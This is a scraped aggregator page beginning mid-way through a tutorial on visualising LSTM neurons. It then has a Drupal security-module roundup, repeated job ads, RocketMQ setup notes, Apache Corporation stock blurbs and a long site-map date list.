    It does. (This is exactly as we would expect, since the long-term memory gets squashed by the tanh activation function and the output gate limits what gets passed on.) For example, here is an overview of all 10 cell state nodes at once. We see plenty of light-colored cells, representing values close to 0.

    Counting LSTM Cell States

    In contrast, the 10 working memory neurons look much more focused. Neurons 1, 3, 5, and 7 are even zeroed out entirely over the first half of the sequence.

    Counting LSTM Hidden States

    Let's go back to Neuron #2. Here are the candidate memory and input gate. They're relatively constant over each half of the sequence – as if the neuron is calculating a += 1 or b += 1 at each step.

    Counting LSTM Candidate Memory

    Input Gate

    Finally, here's an overview of all of Neuron 2's internals:

    Neuron 2 Overview

    If you want to investigate the different counting neurons yourself, you can play around with the visualizer here.

    (Note: this is far from the only way an LSTM can learn to count, and I'm anthropomorphizing quite a bit here. But I think viewing the network's behavior is interesting and can help build better models – after all, many of the ideas in neural networks come from analogies to the human brain, and if we see unexpected behavior, we may be able to design more efficient learning mechanisms.)

    Count von Count

    Let's look at a slightly more complicated counter. This time, I generated sequences of the form

    aaXaXaaYbbbbb
    

    (N a's with X's randomly sprinkled in, followed by a delimiter Y, followed by N b's). The LSTM still has to count the number of a's, but this time needs to ignore the X's as well.

    Here's the full LSTM. We expect to see a counting neuron, but one where the input gate is zero whenever it sees an X. And we do!

    Counter 2 - Cell State

    Above is the cell state of Neuron 20. It increases until it hits the delimiter Y, and then decreases to the end of the sequence – just like it's calculating a num_bs_left_to_print variable that increments on a's and decrements on b's.

    If we look at its input gate, it is indeed ignoring the X's:

    Counter 2 - Input Gate

    Interestingly, though, the candidate memory fully activates on the irrelevant X's – which shows why the input gate is needed. (Although, if the input gate weren't part of the architecture, presumably the network would have presumably learned to ignore the X's some other way, at least for this simple example.)

    Counter 2 - Candidate Memory

    Let's also look at Neuron 10.

    Counter 2 - Neuron 10

    This neuron is interesting as it only activates when reading the delimiter "Y" – and yet it still manages to encode the number of a's seen so far in the sequence. (It may be hard to tell from the picture, but when reading Y's belonging to sequences with the same number of a's, all the cell states have values either identical or within 0.1% of each other. You can see that Y's with fewer a's are lighter than those with more.) Perhaps some other neuron sees Neuron 10 slacking and helps a buddy out.

    Remembering State

    Next, I wanted to look at how LSTMs remember state. I generated sequences of the form

    AxxxxxxYa
    BxxxxxxYb
    

    (i.e., an "A" or B", followed by 1-10 x's, then a delimiter "Y", ending with a lowercase version of the initial character). This way the network needs to remember whether it's in an "A" or "B" state.

    We expect to find a neuron that fires when remembering that the sequence started with an "A", and another neuron that fires when remembering that it started with a "B". We do.

    For example, here is an "A" neuron that activates when it reads an "A", and remembers until it needs to generate the final character. Notice that the input gate ignores all the "x" characters in between.

    A Neuron - #8

    Here is its "B" counterpart:

    B Neuron - #17

    One interesting point is that even though knowledge of the A vs. B state isn't needed until the network reads the "Y" delimiter, the hidden state fires throughout all the intermediate inputs anyways. This seems a bit "inefficient", but perhaps it's because the neurons are doing a bit of double-duty in counting the number of x's as well.

    Copy Task

    Finally, let's look at how an LSTM learns to copy information. (Recall that our Java LSTM was able to memorize and copy an Apache license.)

    (Note: if you think about how LSTMs work, remembering lots of individual, detailed pieces of information isn't something they're very good at. For example, you may have noticed that one major flaw of the LSTM-generated code was that it often made use of undefined variables – the LSTMs couldn't remember which variables were in scope. This isn't surprising, since it's hard to use single cells to efficiently encode multi-valued information like characters, and LSTMs don't have a natural mechanism to chain adjacent memories to form words. Memory networks and neural Turing machines are two extensions to neural networks that help fix this, by augmenting with external memory components. So while copying isn't something LSTMs do very efficiently, it's fun to see how they try anyways.)

    For this copy task, I trained a tiny 2-layer LSTM on sequences of the form

    baaXbaa
    abcXabc
    

    (i.e., a 3-character subsequence composed of a's, b's, and c's, followed by a delimiter "X", followed by the same subsequence).

    I wasn't sure what "copy neurons" would look like, so in order to find neurons that were memorizing parts of the initial subsequence, I looked at their hidden states when reading the delimiter X. Since the network needs to encode the initial subsequence, its states should exhibit different patterns depending on what they're learning.

    The graph below, for example, plots Neuron 5's hidden state when reading the "X" delimiter. The neuron is clearly able to distinguish sequences beginning with a "c" from those that don't.

    Neuron 5

    For another example, here is Neuron 20's hidden state when reading the "X". It looks like it picks out sequences beginning with a "b".

    Neuron 20 Hidden State

    Interestingly, if we look at Neuron 20's cell state, it almost seems to capture the entire 3-character subsequence by itself (no small feat given its one-dimensionality!):

    Neuron 20 Cell State

    Here are Neuron 20's cell and hidden states, across the entire sequence. Notice that its hidden state is turned off over the entire initial subsequence (perhaps expected, since its memory only needs to be passively kept at that point).

    Copy LSTM - Neuron 20 Hidden and Cell

    However, if we look more closely, the neuron actually seems to be firing whenever the next character is a "b". So rather than being a "the sequence started with a b" neuron, it appears to be a "the next character is a b" neuron.

    As far as I can tell, this pattern holds across the network – all the neurons seem to be predicting the next character, rather than memorizing characters at specific positions. For example, Neuron 5 seems to be a "next character is a c" predictor.

    Copy LSTM - Neuron 5

    I'm not sure if this is the default kind of behavior LSTMs learn when copying information, or what other copying mechanisms are available as well.

    States and Gates

    To really hone in and understand the purpose of the different states and gates in an LSTM, let's repeat the previous section with a small pivot.

    Cell State and Hidden State (Memories)

    We originally described the cell state as a long-term memory, and the hidden state as a way to pull out and focus these memories when needed.

    So when a memory is currently irrelevant, we expect the hidden state to turn off – and that's exactly what happens for this sequence copying neuron.

    Copy Machine

    Forget Gate

    The forget gate discards information from the cell state (0 means to completely forget, 1 means to completely remember), so we expect it to fully activate when it needs to remember something exactly, and to turn off when information is never going to be needed again.

    That's what we see with this "A" memorizing neuron: the forget gate fires hard to remember that it's in an "A" state while it passes through the x's, and turns off once it's ready to generate the final "a".

    Forget Gate

    Input Gate (Save Gate)

    We described the job of the input gate (what I originally called the save gate) as deciding whether or not to save information from a new input. Thus, it should turn off at useless information.

    And that's what this selective counting neuron does: it counts the a's and b's, but ignores the irrelevant x's.

    Input Gate

    What's amazing is that nowhere in our LSTM equations did we specify that this is how the input (save), forget (remember), and output (focus) gates should work. The network just learned what's best.

    Extensions

    Now let's recap how you could have discovered LSTMs by yourself.

    First, many of the problems we'd like to solve are sequential or temporal of some sort, so we should incorporate past learnings into our models. But we already know that the hidden layers of neural networks encode useful information, so why not use these hidden layers as the memories we pass from one time step to the next? And so we get RNNs.

    But we know from our own behavior that we don't keep track of knowledge willy-nilly; when we read a new article about politics, we don't immediately believe whatever it tells us and incorporate it into our beliefs of the world. We selectively decide what information to save, what information to discard, and what pieces of information to use to make decisions the next time we read the news. Thus, we want to learn how to gather, update, and apply information – and why not learn these things through their own mini neural networks? And so we get LSTMs.

    And now that we've gone through this process, we can come up with our own modifications.

    • For example, maybe you think it's silly for LSTMs to distinguish between long-term and working memories – why not have one? Or maybe you find separate remember gates and save gates kind of redundant – anything we forget should be replaced by new information, and vice-versa. And now you've come up with one popular LSTM variant, the GRU.
    • Or maybe you think that when deciding what information to remember, save, and focus on, we shouldn't rely on our working memory alone – why not use our long-term memory as well? And now you've discovered Peephole LSTMs.

    Making Neural Nets Great Again

    Let's look at one final example, using a 2-layer LSTM trained on Trump's tweets. Despite the tiny big dataset, it's enough to learn a lot of patterns.

    For example, here's a neuron that tracks its position within hashtags, URLs, and @mentions:

    Hashtags, URLs, @mentions

    Here's a proper noun detector (note that it's not simply firing at capitalized words):

    Proper Nouns

    Here's an auxiliary verb + "to be" detector ("will be", "I've always been", "has never been"):

    Modal Verbs

    Here's a quote attributor:

    Quotes

    There's even a MAGA and capitalization neuron:

    MAGA

    And here are some of the proclamations the LSTM generates (okay, one of these is a real tweet):

    Tweets Tweet

    Unfortunately, the LSTM merely learned to ramble like a madman.

    Recap

    That's it. To summarize, here's what you've learned:

    Candidate Memory

    Here's what you should save:

    Save

    And now it's time for that donut.

    Thanks to Chen Liang for some of the TensorFlow code I used, Ben Hamner and Kaggle for the Trump dataset, and, of course, Schmidhuber and Hochreiter for their original paper. If you want to explore the LSTMs yourself, feel free to play around!


              Valuebound: Implement These Modules to Make Your Drupal Site More Secure      Cache   Translate Page      
    Implement These Modules to Make Your Drupal Site More Secure

    A website with a security hole could be a nightmare for your business, leaving regular users untrusted. The security breach is not just about the website resources, but it could be putting up the website reputation at stake and injecting harmful data in the server & executing them. There could be many ways to do that. One of them is an Automated script, which scans your website and looks up for the sensitive part and tries to bypass the web security with injected code.

    I believe you might be thinking of your website now.

    • Whether your website is fully secured or not? 
    • How to make sure everything ships on our website is generic? And how to protect them? 

    As a Drupal Developer, I’ve come across some of the contributed module available on Drupal.org that can help your site in dealing with security issues. Still, I can’t assure, by applying those modules, you can safeguard your website. But it’s always recommended to follow the set guideline & utilize the modules to minimize the security breaches. 

    Let’s take a look at those modules:

    Secure Pages

    We all know that moving an application from HTTP to HTTPS gives an additional layer of security, which can be trusted by the end users. Unlike regular modules, you just don’t need to follow regular module installations instead your server should be SSL enabled.

    Currently, it is available for Drupal 7 only.
    Ref URL: https://www.Drupal.org/project/securepages

    Security Kit

    The Kit itself is a collection of multiple vulnerabilities such as Cross-site scripting, Cross-site Request Forgery, Clickjacking, SSL/TLS. With the help of security kit module, we can mitigate the common risk of vulnerabilities. Some of the vulnerabilities have already been taken care by Drupal core like clickjacking introduced in 7.50 version.

    Currently, it’s available for both Drupal 7 and Drupal 8.
    Ref URL: https://www.Drupal.org/project/seckit

    Password Policy

    This module is used to enforce users to follow certain rules while setting up the password. A web application with weaker security implementation, allow hackers to guess password easily. That’s the reason you get password policy instruction while setting up the password. It’s not just a fancy password, but secure & difficult to guess.

    # Password should include 1 Capital letter
    # Password should include 1 Numeric
    # Password should include 1 Special Character
    # Password should MIn & Max Character

    This module is currently available for both Drupal 7 and Drupal 8.
    Ref URL: https://www.Drupal.org/project/password_policy

    Paranoia

    This module looks for places in the user interface, where an end user can misuse the input area and block them. Few features that need to showcase here are:

    # Disable permission "use PHP for block visibility".
    # Disable creating “use the PHP” filter.
    # Disable user #1 editing.
    # Prevent risky permissions.
    # Disable disabling this module. 

    Currently, it’s available for Drupal 7 and Drupal 8.
    Ref URL: https://www.Drupal.org/project/paranoia

    Flood Control

    This module provides an Administrative UI to manage user based on UID & User-IP. There is configuration available to manage user restriction based on the nth number of the wrong hit by user ID/IP. We already know that Drupal core has a shield mechanism to protect their user with five unsuccessful logins hit, users get blocked for an hour/minute. With the help of the contributed module, we can dig it a bit.

    Currently, it’s available for Drupal 7.
    Ref URL: https://www.Drupal.org/project/flood_control

    Automated logout

    In terms of user safety, the site administrator can force log out users, if there is no activity from the user end. On top of that, it provides various other configurations like:

    # Set timeout based on roles.
    # Allow users to log in for a longer period of time.
    # User has the ability to set their own time.

    Currently, it’s available for Drupal 7 and Drupal 8.
    Ref URL: https://www.Drupal.org/project/autologout

    Security Review

    This module checks for basic mistakes that we do while setting up a Drupal website. Just untar the module & enable it. This will run an automated security check and produce a result. Remember this won’t fix the errors. You need to manually fix them. Let's take a look at some of the security features that need to be tested by the module:

    # PHP or Javascript in content
    # Avoid information disclosure
    # File system permissions/Secure private files/Only safe upload extensions
    # Database errors
    # Brute-force attack/protecting against XSS
    # Protecting against access misconfiguration/phishing attempts.

    Currently, it’s available for Drupal 7.
    Ref URL: https://www.Drupal.org/project/security_review

    Hacked

    This tool helps developer avoid adding messy code directly to their contributed module, instead of applying patches or new release update. It works on a very simple logic. It scans all the modules & themes available on your site. Download them and compare it with an existing module to make sure modules/themes are on correct shape. The result will give you information on changed module/theme and the rest of the thing you are well aware of - what needs to be done?

    Currently, it’s available for Drupal 7 and Drupal 8.
    Ref URL: https://www.Drupal.org/project/hacked
     

    All of the above modules are my recommendation that a Drupal website should have. Some contributed module will resolve your security issues by providing correct configuration and some of them are just an informer. They will let you know the issue. But you need to manually fix those issue.
     
    Further, these contributed modules provide the atomic security based on the complexity of your site and types of user available. You can look up for the security module and protect your site against anonymous.

    We, at Valuebound - a Drupal CMS development company, help enterprises with Drupal migration, Drupal support, third-party integration, performance tuning, managed services, and others. Get in touch with our Drupal experts to find out how you can enhance user experience and increase engagement on your site.

    xaiwant Tue, 10/09/2018 - 07:58
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Big Data Architect - Pythian - Seattle, WA      Cache   Translate Page      
    Experience Architecting Big Data platforms using Apache Hadoop, Cloudera, Hortonworks and MapR distributions. Big Data Principal Architect*.... $140,000 - $160,000 a year
    From Indeed - Mon, 17 Sep 2018 17:36:04 GMT - View all Seattle, WA jobs
              Google Cloud Solutions Architect - Pythian - Seattle, WA      Cache   Translate Page      
    Experience Architecting Big Data platforms using Apache Hadoop, Cloudera, Hortonworks and MapR distributions. Google Cloud Solutions Architect (Pre Sales)*.... $130,000 - $200,000 a year
    From Indeed - Tue, 21 Aug 2018 19:51:26 GMT - View all Seattle, WA jobs
              Migration of 200 websites from sixteen Redhat 3.0 to four CentOS 7 Servers -- 2      Cache   Translate Page      
    Project description: Migration of 200 web sites from sixteen Redhat 3.0 to four CentOS 7 servers. Scope: - 200 websites running on: o apache o html (http/https) o php o perl o tomcat o mysql... (Budget: $250 - $750 CAD, Jobs: Apache, HTML, MySQL, Perl, PHP)
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Software Engineer - Software to Protect the Oceans      Cache   Translate Page      
    Software Engineer - Software to Protect the Oceans | c£50K Harwell, Didcot, Oxfordshire Up to £50,000 plus pension, plus bonus and healthcare Do you love writing software & making the world a better place? 90% of the world’s fish stocks are nearing or already beyond the limits of sustainable fishing. Illegal fishing risks pushing those stocks over the edge. With over 3 billion people relying on seafood as their main source of protein, and the livelihoods of 12% of the world’s population depending upon the fishing industry, this is fast becoming a global crisis. Our Solution We are tackling this problem through the use of big data analytics such as machine learning, data visualisation, and effective user experience. Our team of fisheries compliance experts, empowered by advanced technology, are helping authorities and seafood buyers around the world drive greater sustainability through increased compliance. We work with governments, government agencies & regulatory bodies, fisheries, retailers, producers, aquaculture and non-government organisations to improve the sustainability of fishing globally. "Come and help us change lives and protect the Oceans" We are looking to interview enthusiastic and ambitious candidates who are eager to learn new technologies and will thrive in a fast-paced start-up environment. The role offers the chance for someone who has recently graduated, or with some commercial experience and is ready to grow their career as a Software Engineer. You will help take our technology to new heights, and to maintain and continually improve our data-driven software systems. We use exciting cutting-edge technologies including Accumulo, GeoMesa, Nifi and other Apache projects, as well as a range of Azure PaaS tools including CosmosDB. What you will bring to the role? + A BSc degree in Computer Science or equivalent however anyone who can demonstrate a passion for programming and solid previous qualifications in the relevant fields will be of interest. + Experience developing software in C# .NET + Experience of using an agile software development methodology + A thorough understanding of the principles of computing, in particular real-world distributed software solutions architecture + Effective prioritisation of tasks and personal time management + Ability to work as an all-rounder as the duties are varied based on the size of the team + An enthusiastic and pro-active "can-do" attitude is essential What we can offer you? + You will learn more than you ever thought possible about the fishing industry, tracking ships with satellites, data analysis, and compliance workflows. + We believe that learning and development never stops and will provide opportunities to feed your curiosity to understand, develop, and learn + Working with innovative teammates You must be eligible to work in the UK You may have worked in the following capacities: C# .NET Developer, C# .NET Software Engineer, Midweight Software Engineer, Graduate Developer, Junior Software Engineer. Interested? Just Apply Below... Application notice... We take your privacy seriously. When you apply, we shall process your details and pass your application to our client for review for this vacancy only. As you might expect we may contact you by email, text or telephone. This processing is conducted lawfully on the basis of our legitimate interests. Please refer to our Data Privacy Policy & Notice on our website for further details. If you have any pre-application questions please contact us first quoting the job title & ref. Good luck, Team RR.
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Apache Corporation to Host Third-Quarter 2018 Results Conference...      Cache   Translate Page      

    HOUSTON, Oct. 10, 2018 (GLOBE NEWSWIRE) -- Apache Corporation (NYSE, Nasdaq: APA) will host its third-quarter 2018 results conference call Thursday, Nov. 1, 2018, at 10 a.m. Central time...

              RocketMQ双Master集群搭建      Cache   Translate Page      
    机器准备 2台独立的linux主机, 内网IP分别为: 172.31.175.142/143 172.31.175.142 NameServer1、 Broker Master1 172.31.175.143 NameServer2、 Broker Master2 安装配置 安装 下载二进制版本解压即可 wget http://mirrors.hust.edu.cn/apache/rocketmq/4.3.0/rocketmq-all-4.3.0-bin-release.zip unzip rocketmq-all-4...
              Re: Outhouse Word Association Game      Cache   Translate Page      
    The Asylum
    Re: Outhouse Word Association Game
    sdsichero wrote:Commando
    Apache more ... Statistics : 30821 Replies || 1220273 Views Last post by pastajoe
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Apache Corp Falls 5.64% on Heavy Volume: Watch For Potential Rebound      Cache   Translate Page      
    Apache Corp (NYSE:APA) traded in a range yesterday that spanned from a low of $46.35 to a high of $49.17. Yesterday, the shares fell 5.6%, which took the...
              Watch for Apache Corp to Potentially Rebound After Falling 5.64% Yesterday      Cache   Translate Page      
    Apache Corp (NYSE:APA) traded in a range yesterday that spanned from a low of $46.35 to a high of $49.17. Yesterday, the shares fell 5.6%, which took the...
              Apache Corp (APA) Approaches New Downside Target of $47.33      Cache   Translate Page      
    Apache Corp (NYSE:APA) has opened bearishly below the pivot of $49.17 today and has reached the first level of support at $48.32. Investors may be interested in a cross...


    Next Page: 10000

    Site Map 2018_01_14
    Site Map 2018_01_15
    Site Map 2018_01_16
    Site Map 2018_01_17
    Site Map 2018_01_18
    Site Map 2018_01_19
    Site Map 2018_01_20
    Site Map 2018_01_21
    Site Map 2018_01_22
    Site Map 2018_01_23
    Site Map 2018_01_24
    Site Map 2018_01_25
    Site Map 2018_01_26
    Site Map 2018_01_27
    Site Map 2018_01_28
    Site Map 2018_01_29
    Site Map 2018_01_30
    Site Map 2018_01_31
    Site Map 2018_02_01
    Site Map 2018_02_02
    Site Map 2018_02_03
    Site Map 2018_02_04
    Site Map 2018_02_05
    Site Map 2018_02_06
    Site Map 2018_02_07
    Site Map 2018_02_08
    Site Map 2018_02_09
    Site Map 2018_02_10
    Site Map 2018_02_11
    Site Map 2018_02_12
    Site Map 2018_02_13
    Site Map 2018_02_14
    Site Map 2018_02_15
    Site Map 2018_02_15
    Site Map 2018_02_16
    Site Map 2018_02_17
    Site Map 2018_02_18
    Site Map 2018_02_19
    Site Map 2018_02_20
    Site Map 2018_02_21
    Site Map 2018_02_22
    Site Map 2018_02_23
    Site Map 2018_02_24
    Site Map 2018_02_25
    Site Map 2018_02_26
    Site Map 2018_02_27
    Site Map 2018_02_28
    Site Map 2018_03_01
    Site Map 2018_03_02
    Site Map 2018_03_03
    Site Map 2018_03_04
    Site Map 2018_03_05
    Site Map 2018_03_06
    Site Map 2018_03_07
    Site Map 2018_03_08
    Site Map 2018_03_09
    Site Map 2018_03_10
    Site Map 2018_03_11
    Site Map 2018_03_12
    Site Map 2018_03_13
    Site Map 2018_03_14
    Site Map 2018_03_15
    Site Map 2018_03_16
    Site Map 2018_03_17
    Site Map 2018_03_18
    Site Map 2018_03_19
    Site Map 2018_03_20
    Site Map 2018_03_21
    Site Map 2018_03_22
    Site Map 2018_03_23
    Site Map 2018_03_24
    Site Map 2018_03_25
    Site Map 2018_03_26
    Site Map 2018_03_27
    Site Map 2018_03_28
    Site Map 2018_03_29
    Site Map 2018_03_30
    Site Map 2018_03_31
    Site Map 2018_04_01
    Site Map 2018_04_02
    Site Map 2018_04_03
    Site Map 2018_04_04
    Site Map 2018_04_05
    Site Map 2018_04_06
    Site Map 2018_04_07
    Site Map 2018_04_08
    Site Map 2018_04_09
    Site Map 2018_04_10
    Site Map 2018_04_11
    Site Map 2018_04_12
    Site Map 2018_04_13
    Site Map 2018_04_14
    Site Map 2018_04_15
    Site Map 2018_04_16
    Site Map 2018_04_17
    Site Map 2018_04_18
    Site Map 2018_04_19
    Site Map 2018_04_20
    Site Map 2018_04_21
    Site Map 2018_04_22
    Site Map 2018_04_23
    Site Map 2018_04_24
    Site Map 2018_04_25
    Site Map 2018_04_26
    Site Map 2018_04_27
    Site Map 2018_04_28
    Site Map 2018_04_29
    Site Map 2018_04_30
    Site Map 2018_05_01
    Site Map 2018_05_02
    Site Map 2018_05_03
    Site Map 2018_05_04
    Site Map 2018_05_05
    Site Map 2018_05_06
    Site Map 2018_05_07
    Site Map 2018_05_08
    Site Map 2018_05_09
    Site Map 2018_05_15
    Site Map 2018_05_16
    Site Map 2018_05_17
    Site Map 2018_05_18
    Site Map 2018_05_19
    Site Map 2018_05_20
    Site Map 2018_05_21
    Site Map 2018_05_22
    Site Map 2018_05_23
    Site Map 2018_05_24
    Site Map 2018_05_25
    Site Map 2018_05_26
    Site Map 2018_05_27
    Site Map 2018_05_28
    Site Map 2018_05_29
    Site Map 2018_05_30
    Site Map 2018_05_31
    Site Map 2018_06_01
    Site Map 2018_06_02
    Site Map 2018_06_03
    Site Map 2018_06_04
    Site Map 2018_06_05
    Site Map 2018_06_06
    Site Map 2018_06_07
    Site Map 2018_06_08
    Site Map 2018_06_09
    Site Map 2018_06_10
    Site Map 2018_06_11
    Site Map 2018_06_12
    Site Map 2018_06_13
    Site Map 2018_06_14
    Site Map 2018_06_15
    Site Map 2018_06_16
    Site Map 2018_06_17
    Site Map 2018_06_18
    Site Map 2018_06_19
    Site Map 2018_06_20
    Site Map 2018_06_21
    Site Map 2018_06_22
    Site Map 2018_06_23
    Site Map 2018_06_24
    Site Map 2018_06_25
    Site Map 2018_06_26
    Site Map 2018_06_27
    Site Map 2018_06_28
    Site Map 2018_06_29
    Site Map 2018_06_30
    Site Map 2018_07_01
    Site Map 2018_07_02
    Site Map 2018_07_03
    Site Map 2018_07_04
    Site Map 2018_07_05
    Site Map 2018_07_06
    Site Map 2018_07_07
    Site Map 2018_07_08
    Site Map 2018_07_09
    Site Map 2018_07_10
    Site Map 2018_07_11
    Site Map 2018_07_12
    Site Map 2018_07_13
    Site Map 2018_07_14
    Site Map 2018_07_15
    Site Map 2018_07_16
    Site Map 2018_07_17
    Site Map 2018_07_18
    Site Map 2018_07_19
    Site Map 2018_07_20
    Site Map 2018_07_21
    Site Map 2018_07_22
    Site Map 2018_07_23
    Site Map 2018_07_24
    Site Map 2018_07_25
    Site Map 2018_07_26
    Site Map 2018_07_27
    Site Map 2018_07_28
    Site Map 2018_07_29
    Site Map 2018_07_30
    Site Map 2018_07_31
    Site Map 2018_08_01
    Site Map 2018_08_02
    Site Map 2018_08_03
    Site Map 2018_08_04
    Site Map 2018_08_05
    Site Map 2018_08_06
    Site Map 2018_08_07
    Site Map 2018_08_08
    Site Map 2018_08_09
    Site Map 2018_08_10
    Site Map 2018_08_11
    Site Map 2018_08_12
    Site Map 2018_08_13
    Site Map 2018_08_15
    Site Map 2018_08_16
    Site Map 2018_08_17
    Site Map 2018_08_18
    Site Map 2018_08_19
    Site Map 2018_08_20
    Site Map 2018_08_21
    Site Map 2018_08_22
    Site Map 2018_08_23
    Site Map 2018_08_24
    Site Map 2018_08_25
    Site Map 2018_08_26
    Site Map 2018_08_27
    Site Map 2018_08_28
    Site Map 2018_08_29
    Site Map 2018_08_30
    Site Map 2018_08_31
    Site Map 2018_09_01
    Site Map 2018_09_02
    Site Map 2018_09_03
    Site Map 2018_09_04
    Site Map 2018_09_05
    Site Map 2018_09_06
    Site Map 2018_09_07
    Site Map 2018_09_08
    Site Map 2018_09_09
    Site Map 2018_09_10
    Site Map 2018_09_11
    Site Map 2018_09_12
    Site Map 2018_09_13
    Site Map 2018_09_14
    Site Map 2018_09_15
    Site Map 2018_09_16
    Site Map 2018_09_17
    Site Map 2018_09_18
    Site Map 2018_09_19
    Site Map 2018_09_20
    Site Map 2018_09_21
    Site Map 2018_09_23
    Site Map 2018_09_24
    Site Map 2018_09_25
    Site Map 2018_09_26
    Site Map 2018_09_27
    Site Map 2018_09_28
    Site Map 2018_09_29
    Site Map 2018_09_30
    Site Map 2018_10_01
    Site Map 2018_10_02
    Site Map 2018_10_03
    Site Map 2018_10_04
    Site Map 2018_10_05
    Site Map 2018_10_06
    Site Map 2018_10_07
    Site Map 2018_10_08
    Site Map 2018_10_09
    Site Map 2018_10_10